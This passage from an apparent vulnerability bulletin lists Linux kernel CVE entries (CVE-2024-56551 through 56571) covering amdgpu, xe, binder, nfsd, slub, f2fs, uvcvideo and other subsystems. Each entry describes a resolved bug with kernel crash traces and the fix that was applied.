__pfx_amdgpu_device_fini_sw+0x10/0x10 [amdgpu] [ +0.000662] ? srso_return_thunk+0x5/0x5f [ +0.000014] ? __kasan_check_write+0x14/0x30 [ +0.000013] ? srso_return_thunk+0x5/0x5f [ +0.000013] ? mutex_unlock+0x80/0xe0 [ +0.000016] amdgpu_driver_release_kms+0x16/0x80 [amdgpu] [ +0.000663] drm_minor_release+0xc9/0x140 [drm] [ +0.000081] drm_release+0x1fd/0x390 [drm] [ +0.000082] __fput+0x36c/0xad0 [ +0.000018] __fput_sync+0x3c/0x50 [ +0.000014] __x64_sys_close+0x7d/0xe0 [ +0.000014] x64_sys_call+0x1bc6/0x2680 [ +0.000014] do_syscall_64+0x70/0x130 [ +0.000014] ? srso_return_thunk+0x5/0x5f [ +0.000014] ? irqentry_exit_to_user_mode+0x60/0x190 [ +0.000015] ? srso_return_thunk+0x5/0x5f [ +0.000014] ? irqentry_exit+0x43/0x50 [ +0.000012] ? srso_return_thunk+0x5/0x5f [ +0.000013] ? exc_page_fault+0x7c/0x110 [ +0.000015] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ +0.000014] RIP: 0033:0x7ffff7b14f67 [ +0.000013] Code: ff e8 0d 16 02 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 73 ba f7 ff [ +0.000026] RSP: 002b:00007fffffffe378 EFLAGS: 00000246 ORIG_RAX: 0000000000000003 [ +0.000019] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ffff7b14f67 [ +0.000014] RDX: 0000000000000000 RSI: 00007ffff7f6f47a RDI: 0000000000000003 [ +0.000014] RBP: 00007fffffffe3a0 R08: 0000555555569890 R09: 0000000000000000 [ +0.000014] R10: 0000000000000000 R11: 0000000000000246 R12: 00007fffffffe5c8 [ +0.000013] R13: 00005555555552a9 R14: 0000555555557d48 R15: 00007ffff7ffd040 [ +0.000020] </TASK> [ +0.000016] Allocated by task 383 on cpu 7 at 26.880319s: [ +0.000014] kasan_save_stack+0x28/0x60 [ +0.000008] kasan_save_track+0x18/0x70 [ +0.000007] kasan_save_alloc_info+0x38/0x60 [ +0.000007] __kasan_kmalloc+0xc1/0xd0 [ +0.000007] kmalloc_trace_noprof+0x180/0x380 [ +0.000007] drm_sched_init+0x411/0xec0 [gpu_sched] [ +0.000012] amdgpu_device_init+0x695f/0xa610 [amdgpu] [ +0.000658] amdgpu_driver_load_kms+0x1a/0x120 [amdgpu] [ +0.000662] amdgpu_pci_p ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56551 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/xe/guc_submit: fix race around suspend_pending Currently in some testcases we can trigger: xe 0000:03:00.0: [drm] Assertion `exec_queue_destroyed(q)` failed! .... WARNING: CPU: 18 PID: 2640 at drivers/gpu/drm/xe/xe_guc_submit.c:1826 xe_guc_sched_done_handler+0xa54/0xef0 [xe] xe 0000:03:00.0: [drm] *ERROR* GT1: DEREGISTER_DONE: Unexpected engine state 0x00a1, guc_id=57 Looking at a snippet of corresponding ftrace for this GuC id we can see: 162.673311: xe_sched_msg_add: dev=0000:03:00.0, gt=1 guc_id=57, opcode=3 162.673317: xe_sched_msg_recv: dev=0000:03:00.0, gt=1 guc_id=57, opcode=3 162.673319: xe_exec_queue_scheduling_disable: dev=0000:03:00.0, 1:0x2, gt=1, width=1, guc_id=57, guc_state=0x29, flags=0x0 162.674089: xe_exec_queue_kill: dev=0000:03:00.0, 1:0x2, gt=1, width=1, guc_id=57, guc_state=0x29, flags=0x0 162.674108: xe_exec_queue_close: dev=0000:03:00.0, 1:0x2, gt=1, width=1, guc_id=57, guc_state=0xa9, flags=0x0 162.674488: xe_exec_queue_scheduling_done: dev=0000:03:00.0, 1:0x2, gt=1, width=1, guc_id=57, guc_state=0xa9, flags=0x0 162.678452: xe_exec_queue_deregister: dev=0000:03:00.0, 1:0x2, gt=1, width=1, guc_id=57, guc_state=0xa1, flags=0x0 It looks like we try to suspend the queue (opcode=3), setting suspend_pending and triggering a disable_scheduling. The user then closes the queue. However the close will also forcefully signal the suspend fence after killing the queue, later when the G2H response for disable_scheduling comes back we have now cleared suspend_pending when signalling the suspend fence, so the disable_scheduling now incorrectly tries to also deregister the queue. This leads to warnings since the queue has yet to even be marked for destruction. We also seem to trigger errors later with trying to double unregister the same queue. To fix this tweak the ordering when handling the response to ensure we don't race with a disable_scheduling that didn't actually intend to perform an unregister. The destruction path should now also correctly wait for any pending_disable before marking as destroyed. (cherry picked from commit f161809b362f027b6d72bd998e47f8f0bad60a2e) | 2024-12-27 | not yet calculated | CVE-2024-56552 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: binder: fix memleak of proc->delivered_freeze If a freeze notification is cleared with BC_CLEAR_FREEZE_NOTIFICATION before calling binder_freeze_notification_done(), then it is detached from its reference (e.g. ref->freeze) but the work remains queued in proc->delivered_freeze. This leads to a memory leak when the process exits as any pending entries in proc->delivered_freeze are not freed: unreferenced object 0xffff38e8cfa36180 (size 64): comm "binder-util", pid 655, jiffies 4294936641 hex dump (first 32 bytes): b8 e9 9e c8 e8 38 ff ff b8 e9 9e c8 e8 38 ff ff .....8.......8.. 0b 00 00 00 00 00 00 00 3c 1f 4b 00 00 00 00 00 ........<.K..... backtrace (crc 95983b32): [<000000000d0582cf>] kmemleak_alloc+0x34/0x40 [<000000009c99a513>] __kmalloc_cache_noprof+0x208/0x280 [<00000000313b1704>] binder_thread_write+0xdec/0x439c [<000000000cbd33bb>] binder_ioctl+0x1b68/0x22cc [<000000002bbedeeb>] __arm64_sys_ioctl+0x124/0x190 [<00000000b439adee>] invoke_syscall+0x6c/0x254 [<00000000173558fc>] el0_svc_common.constprop.0+0xac/0x230 [<0000000084f72311>] do_el0_svc+0x40/0x58 [<000000008b872457>] el0_svc+0x38/0x78 [<00000000ee778653>] el0t_64_sync_handler+0x120/0x12c [<00000000a8ec61bf>] el0t_64_sync+0x190/0x194 This patch fixes the leak by ensuring that any pending entries in proc->delivered_freeze are freed during binder_deferred_release(). | 2024-12-27 | not yet calculated | CVE-2024-56553 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: binder: fix freeze UAF in binder_release_work() When a binder reference is cleaned up, any freeze work queued in the associated process should also be removed. Otherwise, the reference is freed while its ref->freeze.work is still queued in proc->work leading to a use-after-free issue as shown by the following KASAN report: ================================================================== BUG: KASAN: slab-use-after-free in binder_release_work+0x398/0x3d0 Read of size 8 at addr ffff31600ee91488 by task kworker/5:1/211 CPU: 5 UID: 0 PID: 211 Comm: kworker/5:1 Not tainted 6.11.0-rc7-00382-gfc6c92196396 #22 Hardware name: linux,dummy-virt (DT) Workqueue: events binder_deferred_func Call trace: binder_release_work+0x398/0x3d0 binder_deferred_func+0xb60/0x109c process_one_work+0x51c/0xbd4 worker_thread+0x608/0xee8 Allocated by task 703: __kmalloc_cache_noprof+0x130/0x280 binder_thread_write+0xdb4/0x42a0 binder_ioctl+0x18f0/0x25ac __arm64_sys_ioctl+0x124/0x190 invoke_syscall+0x6c/0x254 Freed by task 211: kfree+0xc4/0x230 binder_deferred_func+0xae8/0x109c process_one_work+0x51c/0xbd4 worker_thread+0x608/0xee8 ================================================================== This commit fixes the issue by ensuring any queued freeze work is removed when cleaning up a binder reference. | 2024-12-27 | not yet calculated | CVE-2024-56554 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: binder: fix OOB in binder_add_freeze_work() In binder_add_freeze_work() we iterate over the proc->nodes with the proc->inner_lock held. However, this lock is temporarily dropped to acquire the node->lock first (lock nesting order). This can race with binder_deferred_release() which removes the nodes from the proc->nodes rbtree and adds them into binder_dead_nodes list. This leads to a broken iteration in binder_add_freeze_work() as rb_next() will use data from binder_dead_nodes, triggering an out-of-bounds access: ================================================================== BUG: KASAN: global-out-of-bounds in rb_next+0xfc/0x124 Read of size 8 at addr ffffcb84285f7170 by task freeze/660 CPU: 8 UID: 0 PID: 660 Comm: freeze Not tainted 6.11.0-07343-ga727812a8d45 #18 Hardware name: linux,dummy-virt (DT) Call trace: rb_next+0xfc/0x124 binder_add_freeze_work+0x344/0x534 binder_ioctl+0x1e70/0x25ac __arm64_sys_ioctl+0x124/0x190 The buggy address belongs to the variable: binder_dead_nodes+0x10/0x40 [...] ================================================================== This is possible because proc->nodes (rbtree) and binder_dead_nodes (list) share entries in binder_node through a union: struct binder_node { [...] union { struct rb_node rb_node; struct hlist_node dead_node; }; Fix the race by checking that the proc is still alive. If not, simply break out of the iteration. | 2024-12-27 | not yet calculated | CVE-2024-56555 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: binder: fix node UAF in binder_add_freeze_work() In binder_add_freeze_work() we iterate over the proc->nodes with the proc->inner_lock held. However, this lock is temporarily dropped in order to acquire the node->lock first (lock nesting order). This can race with binder_node_release() and trigger a use-after-free: ================================================================== BUG: KASAN: slab-use-after-free in _raw_spin_lock+0xe4/0x19c Write of size 4 at addr ffff53c04c29dd04 by task freeze/640 CPU: 5 UID: 0 PID: 640 Comm: freeze Not tainted 6.11.0-07343-ga727812a8d45 #17 Hardware name: linux,dummy-virt (DT) Call trace: _raw_spin_lock+0xe4/0x19c binder_add_freeze_work+0x148/0x478 binder_ioctl+0x1e70/0x25ac __arm64_sys_ioctl+0x124/0x190 Allocated by task 637: __kmalloc_cache_noprof+0x12c/0x27c binder_new_node+0x50/0x700 binder_transaction+0x35ac/0x6f74 binder_thread_write+0xfb8/0x42a0 binder_ioctl+0x18f0/0x25ac __arm64_sys_ioctl+0x124/0x190 Freed by task 637: kfree+0xf0/0x330 binder_thread_read+0x1e88/0x3a68 binder_ioctl+0x16d8/0x25ac __arm64_sys_ioctl+0x124/0x190 ================================================================== Fix the race by taking a temporary reference on the node before releasing the proc->inner lock. This ensures the node remains alive while in use. | 2024-12-27 | not yet calculated | CVE-2024-56556 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iio: adc: ad7923: Fix buffer overflow for tx_buf and ring_xfer The AD7923 was updated to support devices with 8 channels, but the size of tx_buf and ring_xfer was not increased accordingly, leading to a potential buffer overflow in ad7923_update_scan_mode(). | 2024-12-27 | not yet calculated | CVE-2024-56557 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nfsd: make sure exp active before svc_export_show The function `e_show` was called with protection from RCU. This only ensures that `exp` will not be freed. Therefore, the reference count for `exp` can drop to zero, which will trigger a refcount use-after-free warning when `exp_get` is called. To resolve this issue, use `cache_get_rcu` to ensure that `exp` remains active. ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 819 at lib/refcount.c:25 refcount_warn_saturate+0xb1/0x120 CPU: 3 UID: 0 PID: 819 Comm: cat Not tainted 6.12.0-rc3+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 RIP: 0010:refcount_warn_saturate+0xb1/0x120 ... Call Trace: <TASK> e_show+0x20b/0x230 [nfsd] seq_read_iter+0x589/0x770 seq_read+0x1e5/0x270 vfs_read+0x125/0x530 ksys_read+0xc1/0x160 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2024-12-27 | not yet calculated | CVE-2024-56558 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mm/vmalloc: combine all TLB flush operations of KASAN shadow virtual address into one operation When compiling kernel source 'make -j $(nproc)' with the up-and-running KASAN-enabled kernel on a 256-core machine, the following soft lockup is shown: watchdog: BUG: soft lockup - CPU#28 stuck for 22s! [kworker/28:1:1760] CPU: 28 PID: 1760 Comm: kworker/28:1 Kdump: loaded Not tainted 6.10.0-rc5 #95 Workqueue: events drain_vmap_area_work RIP: 0010:smp_call_function_many_cond+0x1d8/0xbb0 Code: 38 c8 7c 08 84 c9 0f 85 49 08 00 00 8b 45 08 a8 01 74 2e 48 89 f1 49 89 f7 48 c1 e9 03 41 83 e7 07 4c 01 e9 41 83 c7 03 f3 90 <0f> b6 01 41 38 c7 7c 08 84 c0 0f 85 d4 06 00 00 8b 45 08 a8 01 75 RSP: 0018:ffffc9000cb3fb60 EFLAGS: 00000202 RAX: 0000000000000011 RBX: ffff8883bc4469c0 RCX: ffffed10776e9949 RDX: 0000000000000002 RSI: ffff8883bb74ca48 RDI: ffffffff8434dc50 RBP: ffff8883bb74ca40 R08: ffff888103585dc0 R09: ffff8884533a1800 R10: 0000000000000004 R11: ffffffffffffffff R12: ffffed1077888d39 R13: dffffc0000000000 R14: ffffed1077888d38 R15: 0000000000000003 FS: 0000000000000000(0000) GS:ffff8883bc400000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005577b5c8d158 CR3: 0000000004850000 CR4: 0000000000350ef0 Call Trace: <IRQ> ? watchdog_timer_fn+0x2cd/0x390 ? __pfx_watchdog_timer_fn+0x10/0x10 ? __hrtimer_run_queues+0x300/0x6d0 ? sched_clock_cpu+0x69/0x4e0 ? __pfx___hrtimer_run_queues+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? ktime_get_update_offsets_now+0x7f/0x2a0 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? hrtimer_interrupt+0x2ca/0x760 ? __sysvec_apic_timer_interrupt+0x8c/0x2b0 ? sysvec_apic_timer_interrupt+0x6a/0x90 </IRQ> <TASK> ? asm_sysvec_apic_timer_interrupt+0x16/0x20 ? smp_call_function_many_cond+0x1d8/0xbb0 ? __pfx_do_kernel_range_flush+0x10/0x10 on_each_cpu_cond_mask+0x20/0x40 flush_tlb_kernel_range+0x19b/0x250 ? srso_return_thunk+0x5/0x5f ? kasan_release_vmalloc+0xa7/0xc0 purge_vmap_node+0x357/0x820 ? __pfx_purge_vmap_node+0x10/0x10 __purge_vmap_area_lazy+0x5b8/0xa10 drain_vmap_area_work+0x21/0x30 process_one_work+0x661/0x10b0 worker_thread+0x844/0x10e0 ? srso_return_thunk+0x5/0x5f ? __kthread_parkme+0x82/0x140 ? __pfx_worker_thread+0x10/0x10 kthread+0x2a5/0x370 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x30/0x70 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> Debugging Analysis: 1. The following ftrace log shows that the lockup CPU spends too much time iterating vmap_nodes and flushing TLB when purging vm_area structures. (Some info is trimmed). kworker: funcgraph_entry: | drain_vmap_area_work() { kworker: funcgraph_entry: | mutex_lock() { kworker: funcgraph_entry: 1.092 us | __cond_resched(); kworker: funcgraph_exit: 3.306 us | } ... ... kworker: funcgraph_entry: | flush_tlb_kernel_range() { ... ... kworker: funcgraph_exit: # 7533.649 us | } ... ... kworker: funcgraph_entry: 2.344 us | mutex_unlock(); kworker: funcgraph_exit: $ 23871554 us | } The drain_vmap_area_work() spends over 23 seconds. There are 2805 flush_tlb_kernel_range() calls in the ftrace log. * One is called in __purge_vmap_area_lazy(). * Others are called by purge_vmap_node->kasan_release_vmalloc. purge_vmap_node() iteratively releases kasan vmalloc allocations and flushes TLB for each vmap_area. - [Rough calculation] Each flush_tlb_kernel_range() runs about 7.5ms. -- 2804 * 7.5ms = 21.03 seconds. -- That's why a soft lock is triggered. 2. Extending the soft lockup time can work around the issue (For example, # echo ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56559 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: slab: Fix too strict alignment check in create_cache() On m68k, where the minimum alignment of unsigned long is 2 bytes: Kernel panic - not syncing: __kmem_cache_create_args: Failed to create slab 'io_kiocb'. Error -22 CPU: 0 UID: 0 PID: 1 Comm: swapper Not tainted 6.12.0-atari-03776-g7eaa1f99261a #1783 Stack from 0102fe5c: 0102fe5c 00514a2b 00514a2b ffffff00 00000001 0051f5ed 00425e78 00514a2b 0041eb74 ffffffea 00000310 0051f5ed ffffffea ffffffea 00601f60 00000044 0102ff20 000e7a68 0051ab8e 004383b8 0051f5ed ffffffea 000000b8 00000007 01020c00 00000000 000e77f0 0041e5f0 005f67c0 0051f5ed 000000b6 0102fef4 00000310 0102fef4 00000000 00000016 005f676c 0060a34c 00000010 00000004 00000038 0000009a 01000000 000000b8 005f668e 0102e000 00001372 0102ff88 Call Trace: [<00425e78>] dump_stack+0xc/0x10 [<0041eb74>] panic+0xd8/0x26c [<000e7a68>] __kmem_cache_create_args+0x278/0x2e8 [<000e77f0>] __kmem_cache_create_args+0x0/0x2e8 [<0041e5f0>] memset+0x0/0x8c [<005f67c0>] io_uring_init+0x54/0xd2 The minimal alignment of an integral type may differ from its size, hence is not safe to assume that an arbitrary freeptr_t (which is basically an unsigned long) is always aligned to 4 or 8 bytes. As nothing seems to require the additional alignment, it is safe to fix this by relaxing the check to the actual minimum alignment of freeptr_t. | 2024-12-27 | not yet calculated | CVE-2024-56560 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: PCI: endpoint: Fix PCI domain ID release in pci_epc_destroy() pci_epc_destroy() invokes pci_bus_release_domain_nr() to release the PCI domain ID, but there are two issues: - 'epc->dev' is passed to pci_bus_release_domain_nr() which was already freed by device_unregister(), leading to a use-after-free issue. - Domain ID corresponds to the EPC device parent, so passing 'epc->dev' is also wrong. Fix these issues by passing 'epc->dev.parent' to pci_bus_release_domain_nr() and also do it before device_unregister(). [mani: reworded subject and description] | 2024-12-27 | not yet calculated | CVE-2024-56561 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: i3c: master: Fix miss free init_dyn_addr at i3c_master_put_i3c_addrs() if (dev->boardinfo && dev->boardinfo->init_dyn_addr) ^^^ here check "init_dyn_addr" i3c_bus_set_addr_slot_status(&master->bus, dev->info.dyn_addr, ...) ^^^^ free "dyn_addr" Fix copy/paste error "dyn_addr" by replacing it with "init_dyn_addr". | 2024-12-27 | not yet calculated | CVE-2024-56562 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ceph: fix cred leak in ceph_mds_check_access() get_current_cred() increments the reference counter, but the put_cred() call was missing. | 2024-12-27 | not yet calculated | CVE-2024-56563 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ceph: pass cred pointer to ceph_mds_auth_match() This eliminates a redundant get_current_cred() call, because ceph_mds_check_access() has already obtained this pointer. As a side effect, this also fixes a reference leak in ceph_mds_auth_match(): by omitting the get_current_cred() call, no additional cred reference is taken. | 2024-12-27 | not yet calculated | CVE-2024-56564 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to drop all discards after creating snapshot on lvm device Piergiorgio reported a bug in bugzilla as below: ------------[ cut here ]------------ WARNING: CPU: 2 PID: 969 at fs/f2fs/segment.c:1330 RIP: 0010:__submit_discard_cmd+0x27d/0x400 [f2fs] Call Trace: __issue_discard_cmd+0x1ca/0x350 [f2fs] issue_discard_thread+0x191/0x480 [f2fs] kthread+0xcf/0x100 ret_from_fork+0x31/0x50 ret_from_fork_asm+0x1a/0x30 w/ below testcase, it can reproduce this bug quickly: - pvcreate /dev/vdb - vgcreate myvg1 /dev/vdb - lvcreate -L 1024m -n mylv1 myvg1 - mount /dev/myvg1/mylv1 /mnt/f2fs - dd if=/dev/zero of=/mnt/f2fs/file bs=1M count=20 - sync - rm /mnt/f2fs/file - sync - lvcreate -L 1024m -s -n mylv1-snapshot /dev/myvg1/mylv1 - umount /mnt/f2fs The root cause is: it will update discard_max_bytes of mounted lvm device to zero after creating snapshot on this lvm device, then, __submit_discard_cmd() will pass parameter @nr_sects w/ zero value to __blkdev_issue_discard(), it returns a NULL bio pointer, result in panic. This patch changes as below for fixing: 1. Let's drop all remained discards in f2fs_unfreeze() if snapshot of lvm device is created. 2. Checking discard_max_bytes before submitting discard during __submit_discard_cmd(). | 2024-12-27 | not yet calculated | CVE-2024-56565 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: mm/slub: Avoid list corruption when removing a slab from the full list Boot with slub_debug=UFPZ. If allocated object failed in alloc_consistency_checks, all objects of the slab will be marked as used, and then the slab will be removed from the partial list. When an object belonging to the slab got freed later, the remove_full() function is called. Because the slab is neither on the partial list nor on the full list, it eventually lead to a list corruption (actually a list poison being detected). So we need to mark and isolate the slab page with metadata corruption, do not put it back in circulation. Because the debug caches avoid all the fastpaths, reusing the frozen bit to mark slab page with metadata corruption seems to be fine. [ 4277.385669] list_del corruption, ffffea00044b3e50->next is LIST_POISON1 (dead000000000100) [ 4277.387023] ------------[ cut here ]------------ [ 4277.387880] kernel BUG at lib/list_debug.c:56! [ 4277.388680] invalid opcode: 0000 [#1] PREEMPT SMP PTI [ 4277.389562] CPU: 5 PID: 90 Comm: kworker/5:1 Kdump: loaded Tainted: G OE 6.6.1-1 #1 [ 4277.392113] Workqueue: xfs-inodegc/vda1 xfs_inodegc_worker [xfs] [ 4277.393551] RIP: 0010:__list_del_entry_valid_or_report+0x7b/0xc0 [ 4277.394518] Code: 48 91 82 e8 37 f9 9a ff 0f 0b 48 89 fe 48 c7 c7 28 49 91 82 e8 26 f9 9a ff 0f 0b 48 89 fe 48 c7 c7 58 49 91 [ 4277.397292] RSP: 0018:ffffc90000333b38 EFLAGS: 00010082 [ 4277.398202] RAX: 000000000000004e RBX: ffffea00044b3e50 RCX: 0000000000000000 [ 4277.399340] RDX: 0000000000000002 RSI: ffffffff828f8715 RDI: 00000000ffffffff [ 4277.400545] RBP: ffffea00044b3e40 R08: 0000000000000000 R09: ffffc900003339f0 [ 4277.401710] R10: 0000000000000003 R11: ffffffff82d44088 R12: ffff888112cf9910 [ 4277.402887] R13: 0000000000000001 R14: 0000000000000001 R15: ffff8881000424c0 [ 4277.404049] FS: 0000000000000000(0000) GS:ffff88842fd40000(0000) knlGS:0000000000000000 [ 4277.405357] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4277.406389] CR2: 00007f2ad0b24000 CR3: 0000000102a3a006 CR4: 00000000007706e0 [ 4277.407589] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 4277.408780] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 4277.410000] PKRU: 55555554 [ 4277.410645] Call Trace: [ 4277.411234] <TASK> [ 4277.411777] ? die+0x32/0x80 [ 4277.412439] ? do_trap+0xd6/0x100 [ 4277.413150] ? __list_del_entry_valid_or_report+0x7b/0xc0 [ 4277.414158] ? do_error_trap+0x6a/0x90 [ 4277.414948] ? __list_del_entry_valid_or_report+0x7b/0xc0 [ 4277.415915] ? exc_invalid_op+0x4c/0x60 [ 4277.416710] ? __list_del_entry_valid_or_report+0x7b/0xc0 [ 4277.417675] ? asm_exc_invalid_op+0x16/0x20 [ 4277.418482] ? __list_del_entry_valid_or_report+0x7b/0xc0 [ 4277.419466] ? __list_del_entry_valid_or_report+0x7b/0xc0 [ 4277.420410] free_to_partial_list+0x515/0x5e0 [ 4277.421242] ? xfs_iext_remove+0x41a/0xa10 [xfs] [ 4277.422298] xfs_iext_remove+0x41a/0xa10 [xfs] [ 4277.423316] ? xfs_inodegc_worker+0xb4/0x1a0 [xfs] [ 4277.424383] xfs_bmap_del_extent_delay+0x4fe/0x7d0 [xfs] [ 4277.425490] __xfs_bunmapi+0x50d/0x840 [xfs] [ 4277.426445] xfs_itruncate_extents_flags+0x13a/0x490 [xfs] [ 4277.427553] xfs_inactive_truncate+0xa3/0x120 [xfs] [ 4277.428567] xfs_inactive+0x22d/0x290 [xfs] [ 4277.429500] xfs_inodegc_worker+0xb4/0x1a0 [xfs] [ 4277.430479] process_one_work+0x171/0x340 [ 4277.431227] worker_thread+0x277/0x390 [ 4277.431962] ? __pfx_worker_thread+0x10/0x10 [ 4277.432752] kthread+0xf0/0x120 [ 4277.433382] ? __pfx_kthread+0x10/0x10 [ 4277.434134] ret_from_fork+0x2d/0x50 [ 4277.434837] ? __pfx_kthread+0x10/0x10 [ 4277.435566] ret_from_fork_asm+0x1b/0x30 [ 4277.436280] </TASK> | 2024-12-27 | not yet calculated | CVE-2024-56566 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ad7780: fix division by zero in ad7780_write_raw() In the ad7780_write_raw() , val2 can be zero, which might lead to a division by zero error in DIV_ROUND_CLOSEST(). The ad7780_write_raw() is based on iio_info's write_raw. While val is explicitly declared that can be zero (in read mode), val2 is not specified to be non-zero. | 2024-12-27 | not yet calculated | CVE-2024-56567 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iommu/arm-smmu: Defer probe of clients after smmu device bound Null pointer dereference occurs due to a race between smmu driver probe and client driver probe, when of_dma_configure() for client is called after the iommu_device_register() for smmu driver probe has executed but before the driver_bound() for smmu driver has been called. Following is how the race occurs: T1:Smmu device probe T2: Client device probe really_probe() arm_smmu_device_probe() iommu_device_register() really_probe() platform_dma_configure() of_dma_configure() of_dma_configure_id() of_iommu_configure() iommu_probe_device() iommu_init_device() arm_smmu_probe_device() arm_smmu_get_by_fwnode() driver_find_device_by_fwnode() driver_find_device() next_device() klist_next() /* null ptr assigned to smmu */ /* null ptr dereference while smmu->streamid_mask */ driver_bound() klist_add_tail() When this null smmu pointer is dereferenced later in arm_smmu_probe_device, the device crashes. Fix this by deferring the probe of the client device until the smmu device has bound to the arm smmu driver. [will: Add comment] | 2024-12-27 | not yet calculated | CVE-2024-56568 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix regression with module command in stack_trace_filter When executing the following command: # echo "write*:mod:ext3" > /sys/kernel/tracing/stack_trace_filter The current mod command causes a null pointer dereference. While commit 0f17976568b3f ("ftrace: Fix regression with module command in stack_trace_filter") has addressed part of the issue, it left a corner case unhandled, which still results in a kernel crash. | 2024-12-27 | not yet calculated | CVE-2024-56569 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ovl: Filter invalid inodes with missing lookup function Add a check to the ovl_dentry_weird() function to prevent the processing of directory inodes that lack the lookup function. This is important because such inodes can cause errors in overlayfs when passed to the lowerstack. | 2024-12-27 | not yet calculated | CVE-2024-56570 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: media: uvcvideo: Require entities to have a non-zero unique ID Per UVC 1.1+ specification 3.7.2, units and terminals must have a non-zero unique ID. ``` Each Unit and Terminal within the video function is assigned a unique identification number, the Unit ID (UID) or Terminal ID (TID), contained in the bUnitID or bTerminalID field of the descriptor. The value 0x00 is reserved for undefined ID, ``` So, deny allocating an entity with ID 0 or an ID that belongs to a unit that is already added to the list of entities. This also prevents some syzkaller reproducers from triggering warnings due to a chain of entities referring to themselves. In one particular case, an Output Unit is connected to an Input Unit, both with the same ID of 1. But when looking up for the source ID of the Output Unit, that same entity is found instead of the input entity, which leads to such warnings. In another case, a backward chain was considered finished as the source ID was 0. Later on, that entity was found, but its pads were not valid. Here is a sample stack trace for one of those cases. [ 20.650953] usb 1-1: new high-speed USB device number 2 using dummy_hcd [ 20.830206] usb 1-1: Using ep0 maxpacket: 8 [ 20.833501] usb 1-1: config 0 descriptor?? [ 21.038518] usb 1-1: string descriptor 0 read error: -71 [ 21.038893] usb 1-1: Found UVC 0.00 device <unnamed> (2833:0201) [ 21.039299] uvcvideo 1-1:0.0: Entity type for entity Output 1 was not initialized! [ 21.041583] uvcvideo 1-1:0.0: Entity type for entity Input 1 was not initialized! [ 21.042218] ------------[ cut here ]------------ [ 21.042536] WARNING: CPU: 0 PID: 9 at drivers/media/mc/mc-entity.c:1147 media_create_pad_link+0x2c4/0x2e0 [ 21.043195] Modules linked in: [ 21.043535] CPU: 0 UID: 0 PID: 9 Comm: kworker/0:1 Not tainted 6.11.0-rc7-00030-g3480e43aeccf #444 [ 21.044101] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 [ 21.044639] Workqueue: usb_hub_wq hub_event [ 21.045100] RIP: 0010:media_create_pad_link+0x2c4/0x2e0 [ 21.045508] Code: fe e8 20 01 00 00 b8 f4 ff ff ff 48 83 c4 30 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc 0f 0b eb e9 0f 0b eb 0a 0f 0b eb 06 <0f> 0b eb 02 0f 0b b8 ea ff ff ff eb d4 66 2e 0f 1f 84 00 00 00 00 [ 21.046801] RSP: 0018:ffffc9000004b318 EFLAGS: 00010246 [ 21.047227] RAX: ffff888004e5d458 RBX: 0000000000000000 RCX: ffffffff818fccf1 [ 21.047719] RDX: 000000000000007b RSI: 0000000000000000 RDI: ffff888004313290 [ 21.048241] RBP: ffff888004313290 R08: 0001ffffffffffff R09: 0000000000000000 [ 21.048701] R10: 0000000000000013 R11: 0001888004313290 R12: 0000000000000003 [ 21.049138] R13: ffff888004313080 R14: ffff888004313080 R15: 0000000000000000 [ 21.049648] FS: 0000000000000000(0000) GS:ffff88803ec00000(0000) knlGS:0000000000000000 [ 21.050271] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 21.050688] CR2: 0000592cc27635b0 CR3: 000000000431c000 CR4: 0000000000750ef0 [ 21.051136] PKRU: 55555554 [ 21.051331] Call Trace: [ 21.051480] <TASK> [ 21.051611] ? __warn+0xc4/0x210 [ 21.051861] ? media_create_pad_link+0x2c4/0x2e0 [ 21.052252] ? report_bug+0x11b/0x1a0 [ 21.052540] ? trace_hardirqs_on+0x31/0x40 [ 21.052901] ? handle_bug+0x3d/0x70 [ 21.053197] ? exc_invalid_op+0x1a/0x50 [ 21.053511] ? 